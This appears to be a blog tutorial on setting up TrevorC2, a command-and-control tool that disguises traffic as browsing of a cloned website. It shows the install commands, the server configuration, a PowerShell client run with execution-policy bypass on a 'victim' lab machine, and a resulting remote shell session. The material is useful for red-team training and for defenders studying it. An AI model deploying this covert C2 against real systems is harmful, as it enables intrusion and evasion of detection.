I enjoy playing with new tools and one that I’m fully aware of, but havent had the chance to use is Dave Kennedy’s TrevorC2.
TrevorC2 is a client/server model for masking command and control through a normally browsable website. Detection becomes much harder as time intervals are different and does not use POST requests for data exfil. (Taken from the GitHub page)
This post is going to be a straightforward introduction to quickly installing and using the tool.
The tool can be found here: https://github.com/trustedsec/trevorc2
Installation is super simple.
Run the following from your terminal within Kali Linux.
cd /opt git clone https://github.com/trustedsec/trevorc2.git cd trevorc2/ pip install -r requirements.txt
Configuring the Server
Once installed, the TrevorC2 server will need to be configured.
Dave has made the trevorc2_server.py Python code very easy to understand with a comment about each configurable variable.
In my testing, I didn’t really need to change anything. It is, however, recommended that you change the encryption key.
Use whatever text editor you prefer and modify the trevorc2_server.py file as required. I would recommend changing the domain you would like to replicate and the encryption key.
# CONFIG CONSTANTS: URL = ("https://www.google.com") # URL to clone to house a legitimate website USER_AGENT = ("User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko") # THIS IS WHAT PATH WE WANT TO HIT FOR CODE - THIS CAN BE WHATEVER PATH YOU WANT ROOT_PATH_QUERY = ("/") # THIS FLAG IS WHERE THE CLIENT WILL SUBMIT VIA URL AND QUERY STRING GET PARAMETER SITE_PATH_QUERY = ("/images") # THIS IS THE QUERY STRING PARAMETER USED QUERY_STRING = ("guid=") # STUB FOR DATA - THIS IS USED TO SLIP DATA INTO THE SITE, WANT TO CHANGE THIS SO ITS NOT STATIC STUB = ("oldcss=") # Turn to True for SSL support SSL = False CERT_FILE = "" # Your Certificate for SSL # THIS IS OUR ENCRYPTION KEY - THIS NEEDS TO BE THE SAME ON BOTH SERVER AND CLIENT FOR APPROPRIATE DECRYPTION. RECOMMEND CHANGING THIS FROM THE DEFAULT KEY CIPHER = ("Tr3v0rC2R0x@nd1s@w350m3#TrevorForget")
Configuring the Client
All I had to modify within the trevorc2_client.ps1 code was the $SITE_URL variable. This is used to specify the URL/IP Address of the TrevorC2 server listening for connections.
nano trevorc2_client.ps1 $SITE_URL = "http://192.168.0.16"
Also modify the $CIPHER variable to match the one within the trevorc2_server.py file if you have changed it.
Starting the Server
Once the server and client Python files are configured, we’re going to start the server and start receiving agents.
Run the following to the start the server:
python trevorc2_server.py TrevorC2 - Legitimate Website Covert Channel Written by: David Kennedy (@HackingDave) https://www.trustedsec.com [*] Cloning website: https://www.google.com [*] Site cloned successfully. [*] Starting Trevor C2 Server... [*] Next, enter the command you want the victim to execute. [*] Client uses random intervals, this may take a few. [*] Type help for usage. Example commands, list, interact.
The server is running and now listening for connections (agents). As always, I’d recommend running the help command to understand what functionality you have.
Gaining a Shell
In reality, you would entice the victim to run the following code in some way. However; for this introduction, I will simply run the trevorc2_client.ps1 file on the victim machine.
C:\Users\IEUser\Desktop>powershell -ep bypass Windows PowerShell Copyright (C) 2009 Microsoft Corporation. All rights reserved. PS C:\Users\IEUser\Desktop> . .\trevorc2_client.ps1
As shown, on the server side of things. We have an agent to interact with.
trevorc2> *** Received connection from 192.168.0.8 and hostname IEWIN7 for TrevorC2. IEWIN7:trevorc2>ipconfig [*] Waiting for command to be executed, be patient, results will be displayed here... [*] Received response back from client... =-=-=-=-=-=-=-=-=-=-= (HOSTNAME: IEWIN7 CLIENT: 192.168.0.8) Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::80ac:4126:fa58:1b81%10 IPv4 Address. . . . . . . . . . . : 192.168.0.8 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.0.1
Hopefully this gets you started. Huge thanks for Dave Kennedy for developing this awesome tool. Give him a follow if you don’t already (@HackingDave).